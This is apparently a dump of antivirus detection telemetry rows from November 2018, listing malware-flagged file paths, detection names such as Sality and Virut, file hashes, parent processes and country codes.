  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{06332CB9-78B5-49D8-A9B1-18CF5E84F1B7}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='14e1d424c84cb2c830a181196637b8888a1110e2928e3fa9e5b07f8c96931ff2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flash_tool.exe', filepath='D:\\archos\\Archos_50B_Platinum_MT6582_4.4.2_SLFQPLUS10B-S10A_ARCHOS_L43EN_205_140825162345\\SP Flash Tool v5.1644\\flash_tool.exe', filesize=8512000, name='W32/Ramnit.C.#M1.#R1'), hash='14f23866f8929d873f12b621882cac5174a90dacb7ada30e330722247877a6f8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T18:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\NVIDIA Corporation\\Update Core\\NvBackend.exe', parentsize=2655520, timestamp='2018-11-02T23:27:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\NVIDIA Corporation\\Update Core\\NvBackend.exe', parentsize=2655520, timestamp='2018-11-02T02:12:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='1572407c94033e0435af07264e253f7264828b753899e8656e71be737ecce748', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105451-63a58173', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bd13db55\\AVSCAN-20181102-101718-9263BFE3\\AVSCAN-20181102-105451-63A58173', filesize=300000, name='PUA/MPCCleaner.#M1.#R1'), hash='15d2c9190929cdf42bc0c52a952f4e9e5d81e47f7b25acd43f026039cf0039d4', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15D48CED869114D974CD56C0999A6CF81B73FCF3E3806558BE64D94187D42536', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15D48CED869114D974CD56C0999A6CF81B73FCF3E3806558BE64D94187D42536', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keyhook64.dll', filepath='C:\\Windows\\KeyHook64.dll', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-02T02:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102007-9e130b15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b7cae0b0\\AVSCAN-20181102-101953-9C0832BF\\AVSCAN-20181102-102007-9E130B15', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gohan.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Gohan\\Gohan.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='161b399824da2e7687bf2c7bc304a0d615bedc65ba7682613d2299aff37b74a8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-31.03.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='16406fc404c83d378fd85aff83733a76fb02eaaa3863f5db65229c1238998e3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-31.03.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='16406fc404c83d378fd85aff83733a76fb02eaaa3863f5db65229c1238998e3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-31.03.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='16406fc404c83d378fd85aff83733a76fb02eaaa3863f5db65229c1238998e3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\1687483A29C55E00B2E6B3F69B81DB32ACF7DF9C79B07A83F3F72067D84EBB31.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:41:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='online.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Online\\Online.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lockups.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Playing_the_Game\\Lockups\\Lockups.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whxdata.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\whxdata\\whxdata.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='media_issues.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Media_Issues\\Media_Issues.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playing_the_game.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Playing_the_Game\\Playing_the_Game.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='issues_after_install.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Issues_After_Install\\Issues_After_Install.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whdata.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\whdata\\whdata.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='requirements_issues.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Requirements_Issues\\Requirements_Issues.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='standard_items.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Standard_Items\\Standard_Items.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='starting_the_game.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Starting_the_Game\\Starting_the_Game.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='en-us.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\en-us\\en-us.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ea help.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\EA Help.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='directx.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\DirectX\\DirectX.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crashes.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Starting_the_Game\\Crashes\\Crashes.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whgdata.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\whgdata\\whgdata.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\images\\images.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='install.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Install.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='هوكى الجليد.exe', filepath='E:\\حسين حسن\\برنامج الأحلام\\بارا الفراعنه\\العاب خفيفة\\لعاب اطفال\\هوكى الجليد.exe', filesize=384000, name='W32/Virut.Gen.#M1.#R1'), hash='17cf7f3cbbee1129896e997381cb05183d445cae148d680be2dccd08840116c7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:23:54Z'), dt=datetime.date(2018, 11, 2)),
